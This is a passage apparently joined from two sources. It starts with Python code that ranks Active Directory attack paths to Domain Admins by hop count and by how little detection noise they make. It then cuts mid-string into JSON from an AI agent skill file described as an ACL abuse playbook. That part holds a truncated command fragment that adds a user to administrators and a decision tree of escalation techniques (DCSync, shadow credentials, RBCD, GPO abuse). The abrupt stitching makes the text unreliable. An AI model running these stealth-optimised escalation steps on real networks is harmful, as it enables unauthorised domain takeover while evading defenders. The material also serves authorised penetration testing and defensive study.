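    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def fewest_hops(edges, owned, targets):
    """What shortestPath() does: BFS, the first target reached wins. Returns [(src, edge, dst)]."""
    adj = _adjacency(edges)
    queue = deque((n, []) for n in owned)
    seen = set(owned)
    while queue:
        node, path = queue.popleft()
        if node in targets:
            return path
        for rel, nxt in adj.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, rel, nxt)]))
    return None


def quietest_path(edges, owned, targets, noise=NOISE):
    """Dijkstra from every owned node to any target. Returns (cost, path) or None."""
    adj = _adjacency(edges)
    order = itertools.count()                       # tie-breaker so paths are never compared
    heap = [(0, next(order), n, []) for n in owned]
    settled = set()
    while heap:
        cost, _, node, path = heapq.heappop(heap)
        if node in settled:
            continue
        settled.add(node)
        if node in targets:
            return cost, path
        for rel, nxt in adj.get(node, []):
            if rel in noise and nxt not in settled:  # unknown edge types are skipped, not guessed at
                heapq.heappush(heap, (cost + noise[rel], next(order), nxt, path + [(node, rel, nxt)]))
    return None


def render(path):
    """'A -GenericWrite-> B -MemberOf-> C' for a path of (src, edge, dst) triples."""
    if not path:
        return ""
    out = path[0][0]
    for _, rel, dst in path:
        out += f" -{rel}-> {dst}"
    return out


# Constructed graph: Pattern 2 from §3 plus a one-hop AddMember and a direct password reset.
DA = "DOMAIN ADMINS@DOMAIN.COM"
EDGES = [
    ("LOWPRIV@DOMAIN.COM", "AddMember", DA),                            # 1 hop, cost 6
    ("LOWPRIV@DOMAIN.COM", "GenericWrite", "HELPDESK@DOMAIN.COM"),      # Pattern 2: 2 + 2 + 0 = 4
    ("HELPDESK@DOMAIN.COM", "GenericAll", "SVC_ADMIN@DOMAIN.COM"),
    ("SVC_ADMIN@DOMAIN.COM", "MemberOf", DA),
    ("LOWPRIV@DOMAIN.COM", "ForceChangePassword", "SVC_ADMIN@DOMAIN.COM"),  # 5 + 0 = 5
]
OWNED = {"LOWPRIV@DOMAIN.COM"}

if __name__ == "__main__":
    print("fewest hops :", render(fewest_hops(EDGES, OWNED, {DA})))
    cost, path = quietest_path(EDGES, OWNED, {DA})
    print(f"quietest ({cost}):", render(path))
```

Export the edges with a Cypher `MATCH (a)-[r]->(b) RETURN a.name, type(r), b.name` over the owned subgraph and feed them in; anything not in `NOISE` is ignored rather than silently costed at zero, which is the safe failure mode when a new edge type shows up.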
administrators lowpriv /add\" -dc-ip DC01","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"8. ACL ATTACK DECISION TREE","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Have domain user access — want to escalate via ACL\n│\n├── Run BloodHound → analyze shortest paths to DA\n│ └── Upload data → \"Shortest Paths to Domain Admins from Owned Principals\"\n│\n├── Direct ACL on user object?\n│ ├── GenericAll → force password change, shadow creds, or targeted kerberoast (§3)\n│ ├── GenericWrite → shadow credentials or set SPN (§3/§5)\n│ ├── ForceChangePassword → reset password directly (§3)\n│ ├── WriteDACL → grant yourself GenericAll, then exploit (§3)\n│ └── WriteOwner → take ownership → WriteDACL → GenericAll (§3)\n│\n├── ACL on group?\n│ ├── AddMember / GenericAll → add self to privileged group (§3)\n│ └── WriteDACL → grant AddMember, then add self\n│\n├── ACL on computer object?\n│ ├── GenericAll/GenericWrite → RBCD attack (§3)\n│ ├── AllExtendedRights → read LAPS password (§6)\n│ └── GenericWrite → shadow credentials on machine (§5)\n│\n├── ACL on domain object?\n│ ├── WriteDACL → grant DCSync rights to self (§4)\n│ └── Replication rights already? 
→ DCSync directly (§4)\n│\n├── ACL on GPO linked to privileged OU?\n│ └── Write access → add admin / scheduled task via GPO (§7)\n│\n└── Complex multi-hop chain?\n └── Load BLOODHOUND_PATHS.md for Cypher queries and chain analysis","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"active-directory-acl-abuse","author":"@skillopedia","source":{"stars":853,"repo_name":"hack-skills","origin_url":"https://github.com/yaklang/hack-skills/blob/HEAD/skills/active-directory-acl-abuse/SKILL.md","repo_owner":"yaklang","body_sha256":"8f70c8a676670ee512031c76ea08aa65f52520bda8031df22a41be80ffc42b0d","cluster_key":"a47553cdce565ff7a05e5bfb331748b213117dbd421b604f090960a66fd24acb","clean_bundle":{"format":"clean-skill-bundle-v1","source":"yaklang/hack-skills/skills/active-directory-acl-abuse/SKILL.md","attachments":[{"id":"486e03a2-5929-5288-b861-73487ece2247","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/486e03a2-5929-5288-b861-73487ece2247/attachment.md","path":"BLOODHOUND_PATHS.md","size":7305,"sha256":"285eb5fdf7f283e10b4ad87c7f019c53b983c86c59c9d01fa038c3d954c2607e","contentType":"text/markdown; charset=utf-8"}],"bundle_sha256":"27cc064083205abaa7ee4e7fad6a2c233ada71898f9c205fe57503599c6d3946","attachment_count":1,"text_attachments":1,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/active-directory-acl-abuse/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Active Directory ACL abuse playbook. Use when exploiting misconfigured AD permissions including GenericAll, WriteDACL, DCSync rights, shadow credentials, LAPS reading, GPO abuse, and BloodHound-guided attack paths."}},"renderedAt":1782981313726}
